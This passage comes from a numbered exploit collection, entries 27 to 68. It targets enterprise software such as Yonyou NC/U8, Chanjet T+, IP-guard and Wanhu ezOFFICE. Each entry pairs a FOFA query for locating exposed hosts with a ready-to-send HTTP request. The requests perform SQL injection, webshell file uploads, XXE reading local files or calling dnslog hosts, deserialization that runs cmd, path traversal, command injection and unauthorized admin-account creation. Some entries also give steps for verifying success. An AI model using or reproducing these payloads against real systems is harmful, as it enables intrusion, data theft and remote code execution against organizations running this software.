User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. 用友 NC showcontent SQL injection
FOFA:icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. 用友NC grouptemplet arbitrary file upload
FOFA:icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. 用友NC down/bill SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. 用友NC importPml SQL injection
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg
------WebKitFormBoundaryH970hbttBhoCyj9V--

31. 用友NC runStateServlet SQL injection
version<=6.5
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded

32. 用友NC complainbilldetail SQL injection
version= NC633, NC65
FOFA:app="用友-UFIDA-NC"
GET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

33. 用友NC downTax/download SQL injection
version:NC6.5
FOFA:app="用友-UFIDA-NC"
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

34. 用友NC warningDetailInfo interface SQL injection
FOFA:app="用友-UFIDA-NC"
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

35. 用友NC-Cloud importhttpscer arbitrary file upload
FOFA:app="用友-NC-Cloud"
POST /nccloud/mob/pfxx/manualload/importhttpscer HTTP/1.1
Host: 203.25.218.166:8888
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
accessToken: eyJhbGciOiJIUzUxMiJ9.eyJwa19ncm91cCI6IjAwMDE2QTEwMDAwMDAwMDAwSkI2IiwiZGF0YXNvdXJjZSI6IjEiLCJsYW5nQ29kZSI6InpoIiwidXNlclR5cGUiOiIxIiwidXNlcmlkIjoiMSIsInVzZXJDb2RlIjoiYWRtaW4ifQ.XBnY1J3bVuDMYIfPPJXb2QC0Pdv9oSvyyJ57AQnmj4jLMjxLDjGSIECv2ZjH9DW5T0JrDM6UHF932F5Je6AGxA
Content-Length: 190
Content-Type: multipart/form-data; boundary=fd28cb44e829ed1c197ec3bc71748df0

--fd28cb44e829ed1c197ec3bc71748df0
Content-Disposition: form-data; name="file"; filename="./webapps/nc_web/1.jsp"

<%out.println(1111*1111);%>
--fd28cb44e829ed1c197ec3bc71748df0--

36. 用友NC-Cloud soapFormat XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/soapFormat.ajax HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Content-Length: 263
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1

msg=<!DOCTYPE foo[<!ENTITY xxe1two SYSTEM "file:///C://windows/win.ini"> ]><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><soap:Fault><faultcode>soap:Server%26xxe1two%3b</faultcode></soap:Fault></soap:Body></soap:Envelope>%0a

37. 用友NC-Cloud IUpdateService XXE
FOFA:body="/Client/Uclient/UClient.exe"||body="ufida.ico"||body="nccloud"||body="/api/uclient/public/"
POST /uapws/service/nc.uap.oba.update.IUpdateService HTTP/1.1
Host: 192.168.40.130:8989
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Content-Length: 421
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: text/xml;charset=UTF-8
SOAPAction: urn:getResult
Upgrade-Insecure-Requests: 1

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:iup="http://update.oba.uap.nc/IUpdateService">
<soapenv:Header/>
<soapenv:Body>
<iup:getResult>
<!--type: string-->
<iup:string><![CDATA[
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM "http://c2vkbwbs.dnslog.pw">%aaa;%ccc;%ddd;]>
<xxx/>]]></iup:string>
</iup:getResult>
</soapenv:Body>
</soapenv:Envelope>

38. 用友U8 Cloud smartweb2.RPC.d XXE
FOFA:app="用友-U8-Cloud"
POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1
Host: 192.168.40.131:8088
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/12.0 Safari/1200.1.25
Content-Length: 260
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

__viewInstanceId=nc.bs.hrss.rm.ResetPassword~nc.bs.hrss.rm.ResetPasswordViewModel&__xml=<!DOCTYPE z [<!ENTITY Password SYSTEM "file:///C://windows//win.ini" >]><rpc transaction="10" method="resetPwd"><vps><p name="__profileKeys">%26Password;</p ></vps></rpc>

39. 用友U8 Cloud RegisterServlet SQL injection
FOFA:title="u8c"
POST /servlet/RegisterServlet HTTP/1.1
Host: 192.168.86.128:8089
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 85
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip

usercode=1' and substring(sys.fn_sqlvarbasetostr(HashBytes('MD5','123456')),3,32)>0--

40. 用友U8-Cloud XChangeServlet XXE
FOFA:app="用友-U8-Cloud"
POST /service/XChangeServlet HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Content-Type: text/xml
Connection: close

<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://farr9frh.dnslog.pw">]><r><a>&xxe;</a ></r>

41. 用友U8 Cloud MeasureQueryByToolAction SQL injection
FOFA:app="用友-U8-Cloud"
GET /service/~iufo/com.ufida.web.action.ActionServlet?action=nc.ui.iufo.query.measurequery.MeasureQueryByToolAction&method=execute&query_id=1%27);WAITFOR+DELAY+%270:0:5%27--+ HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json
Accept-Encoding: gzip
Connection: close

42. 用友GRP-U8 SmartUpload01 file upload
FOFA:app="用友-GRP-U8"
POST /u8qx/SmartUpload01.jsp HTTP/1.1
Host: x.x.x.x
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzhvrkrqt
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36

PAYLOAD

http://x.x.x.x/jatoolsreport?file=/1.pdf&as=dhtml

43. 用友GRP-U8 userInfoWeb SQL injection leading to RCE
FOFA:app="用友-GRP-U8"
POST /services/userInfoWeb HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
SOAPAction:
Content-Type: text/xml;charset=UTF-8

<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://service.pt.midas.ufgov.com">
   <soapenv:Header/>
   <soapenv:Body>
      <ser:getUserNameById soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
         <userId xsi:type="soapenc:string" xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">';waitfor delay '0:0:5'--</userId>
      </ser:getUserNameById>
   </soapenv:Body>
</soapenv:Envelope>

44. 用友GRP-U8 bx_dj_check.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/bx_dj_check.jsp?djlxdm=OER&djid=1';waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

45. 用友GRP-U8 ufgovbank XXE
FOFA:app="用友-GRP-U8"
POST /ufgovbank HTTP/1.1
Host: 192.168.40.130:2220
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Connection: close
Content-Length: 161
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

reqData=<?xml version="1.0"?>
<!DOCTYPE foo SYSTEM "http://c2vkbwbs.dnslog.pw">&signData=1&userIP=1&srcFlag=1&QYJM=0&QYNC=adaptertest

46. 用友GRP-U8 sqcxIndex.jsp SQL injection
FOFA:app="用友-GRP-U8"
GET /u8qx/sqcxIndex.jsp?key=1');+waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

47. 用友GRP A++Cloud government finance cloud arbitrary file read
FOFA:body="/pf/portal/login/css/fonts/style.css"
GET /ma/emp/maEmp/download?fileName=../../../etc/passwd HTTP/1.1
Host: x.x.x.x
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
If-Modified-Since: Wed, 11 Oct 2023 05:16:05 GMT
Connection: close

48. 用友U8 CRM swfupload arbitrary file upload
FOFA:title="用友U8CRM"
POST /ajax/swfupload.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data;boundary=----269520967239406871642430066855
------269520967239406871642430066855
Content-Disposition: form-data; name="file"; filename="s.php"
1231
Content-Type: application/octet-stream
------269520967239406871642430066855
Content-Disposition: form-data; name="upload"
upload
------269520967239406871642430066855--

49. 用友U8 CRM system uploadfile.php interface arbitrary file upload
FOFA:body="用友U8CRM"
POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Content-Length: 329
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------vvv3wdayqv3yppdxvn3w

-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="file"; filename="%s.php "
Content-Type: application/octet-stream

wersqqmlumloqa
-----------------------------vvv3wdayqv3yppdxvn3w
Content-Disposition: form-data; name="upload"

upload
-----------------------------vvv3wdayqv3yppdxvn3w--

http://x.x.x.x/tmpfile/updB3CB.tmp.php

50. QDocs Smart School 6.4.1 filterRecords SQL injection
FOFA:body="close closebtnmodal"
POST /course/filterRecords/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 224
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

searchdata[0][title]=&searchdata[0][searchfield]=1&searchdata[0][searchvalue]=1&searchdata[1][title]=1&searchdata[1][searchfield]=1=1 and extractvalue(1,concat(0x5e,(select md5(123456)),0x5e))%23&searchdata[1][searchvalue]=1

51. 云时空 social commerce ERP system validateLoginName SQL injection
FOFA:app="云时空社会化商业ERP系统"
GET /sys/user/validateLoginName?loginName=admin'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

52. 泛微E-Office json_common.php SQL injection
FOFA:app="泛微-EOffice"
POST /building/json_common.php HTTP/1.1
Host: 192.168.86.128:8097
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Content-Length: 87
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

tfs=city` where cityId =-1 /*!50000union*/ /*!50000select*/1,2,md5(102103122) ,4#|2|333

53. 迪普 DPTech VPN Service arbitrary file upload
FOFA:app="DPtech-SSLVPN"
/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

54. 畅捷通T+ getstorewarehousebystore remote code execution
FOFA:app="畅捷通-TPlus"
Step 1: send the packet to the target; it executes a command that writes the specified string into the specified file
"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"

Full packet
POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F
Content-Length: 593

{
"storeID":{
"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
"MethodName":"Start",
  "ObjectInstance":{
   "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "StartInfo":{
   "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
    "FileName":"cmd",
    "Arguments":"/c echo 2WcBDoxC7JXhegsmOp6vJJ2dZBl > .2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt"
    }
  }
  }
}

Step 2: visit the following URL
/tplus/.2WcBDoxC7JXhegsmOp6vJJ2dZBl.txt

55. 畅捷通T+ getdecallusers information disclosure
FOFA:app="畅捷通-TPlus"
Step 1: obtain a Cookie through the interface
/tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx?method=CheckPassword
Step 2: use the obtained Cookie to request
/tplus/sm/privilege/ajaxpro/Ufida.T.SM.UIP.Privilege.PreviligeControl,Ufida.T.SM.UIP.ashx?method=GetDecAllUsers

56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx deserialization RCE
FOFA: app="畅捷通-TPlus"
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Type: application/json

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
   "MethodName":"Start",
    "ObjectInstance":{
       "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "StartInfo": {
           "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
           "FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
       }
    }
  }
}

57. 畅捷通T+ keyEdit.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

58. 畅捷通T+ KeyInfoList.aspx SQL injection
FOFA:app="畅捷通-TPlus"
GET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

59. XETUX software dynamiccontent.properties.xhtml remote code execution
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
POST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1
Host: 192.168.86.128:9090
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Content-Length: 1669
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

PAYLOAD

60. Byzoro (百卓) Smart management platform importexport.php SQL injection
FOFA:title="Smart管理平台"
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

61. Zheda Entsoft (浙大恩特) customer resource management system fileupload arbitrary file upload
FOFA: title="欢迎使用浙大恩特客户资源管理系统"
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 27
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en
Content-Type: application/x-www-form-urlencoded

8uxssX66eqrqtKObcVa0kid98xa

62. IP-guard WebServer remote command execution
FOFA:"IP-guard" && icon_hash="2030860561"
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Then request:

GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
Host: x.x.x.x

63. IP-guard WebServer arbitrary file read
IP-guard < 4.82.0609.0
FOFA:icon_hash="2030860561"
POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A

64. Jiecheng (捷诚) management information system CWSFinanceCommon SQL injection
FOFA:body="/Scripts/EnjoyMsg.js"
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.1
Host: 192.168.86.128:9001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Connection: close
Content-Length: 369
Accept: */*
Accept-Language: en
Content-Type: text/xml; charset=utf-8
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetOSpById xmlns="http://tempuri.org/">
      <sId>1';waitfor delay '0:0:5'--+</sId>
    </GetOSpById>
  </soap:Body>
</soap:Envelope>

65. Youkate (优卡特) 脸爱云 face-recognition smart management platform 1.0.55.0.0.1 authorization bypass
FOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"
A 200 response means the account test123456/123456 has been created.
POST /SystemMng.ashx HTTP/1.1
Host:
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Accept-Language: en
Content-Length: 174

operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators

66. Wanhu (万户) ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
FOFA:app="万户ezOFFICE协同管理平台"

GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

If lines 42 and 43 of the response contain the string 6cfe798ba8e5b85feb50164c59f4bec9, the vulnerability is confirmed.

67. Wanhu (万户) ezOFFICE wpsservlet arbitrary file upload
FOFA:app="万户网络-ezOFFICE"
The newdocId and filename parameters set the name of the written file, dir sets the directory it is written to, and fileType sets the file type.
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 173
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Connection: close
Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
DNT: 1
Upgrade-Insecure-Requests: 1

--ufuadpxathqvxfqnuyuqaozvseiueerp
Content-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"

<% out.print("sasdfghjkj");%>
--ufuadpxathqvxfqnuyuqaozvseiueerp--

The written file is reachable at /defaultroot/platform/portal/layout/apoxkq.jsp

68. Wanhu (万户) ezOFFICE wf_printnum.jsp SQL injection
FOFA:app="万户ezOFFICE协同管理平台"
GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
